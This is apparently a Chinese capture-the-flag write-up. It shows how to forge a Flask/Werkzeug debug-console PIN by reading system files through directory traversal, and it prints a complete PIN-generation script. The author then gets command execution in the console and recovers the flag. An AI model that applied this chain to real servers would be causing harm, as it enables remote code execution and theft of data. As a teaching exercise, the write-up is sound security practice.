审题
打开环境,根据提示访问页面,看到过滤掉了cgroup、flag、self
让页面报错,发现console是开启的
然后就是需要一个PIN码
get请求可以进行目录穿越,接下来就是要根据文件得到的内容去生成PIN码
username(/etc/passwd)
app.py路径(页面报错获得)
mac address(/sys/class/net/eth0/address或/sys/class/net/ens33/address)
machine-id(/etc/machine-id)
cpuid(/proc/self/cgroup)这里题目ban了self和cgroup,可以换(/proc/1/cpuset)具体原因可以参考这篇文章->在这里
username获取
得到app
app.py路径获取
得到/usr/local/lib/python3.8/site-packages/flask/app.py
mac address获取
这里要注意需要对address进行处理
addr = '02:42:ac:02:0b:64'
print(int(addr.replace(':', ''), 16))
得到2485376912228
machine-id获取
得到7265fe765262551a676151a24c02b7b6
cpuid获取
得到cd4b392caf6a02636f16f97b830f3b5564d27d7a2985edeedca7582fa6d23114
machine-id拼接cpuid
7265fe765262551a676151a24c02b7b6cd4b392caf6a02636f16f97b830f3b5564d27d7a2985edeedca7582fa6d23114
跑脚本得到PIN码,脚本可以网上随便找,我用的是
import hashlib
from itertools import chain
probably_public_bits = [
'app',# username
'flask.app',# modname
'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/usr/local/lib/python3.8/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]
private_bits = [
'2485376912228',# str(uuid.getnode()), /sys/class/net/eth0/address
'7265fe765262551a676151a24c02b7b6cd4b392caf6a02636f16f97b830f3b5564d27d7a2985edeedca7582fa6d23114'# get_machine_id(), /etc/machine-id
]
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode("utf-8")
h.update(bit)
h.update(b"cookiesalt")
cookie_name = f"__wzd{h.hexdigest()[:20]}"
# If we need to generate a pin we salt it a bit more so that we don't
# end up with the same value and generate out 9 digits
num = None
if num is None:
h.update(b"pinsalt")
num = f"{int(h.hexdigest(), 16):09d}"[:9]
# Format the pincode in groups of digits for easier remembering if
# we don't have a result yet.
rv = None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = "-".join(
num[x : x + group_size].rjust(group_size, "0")
for x in range(0, len(num), group_size)
)
break
else:
rv = num
print(rv)
生成PIN:155-314-265
进入console
导入os,执行系统命令,这里傻了一下,一开始没注意到后面的+号。flag文件怎么都读不出东西……
真的flag在readflag文件里……
得到flag
HSCSEC{45035c7e-1eb5-452f-8356-2fc000e3d2b4}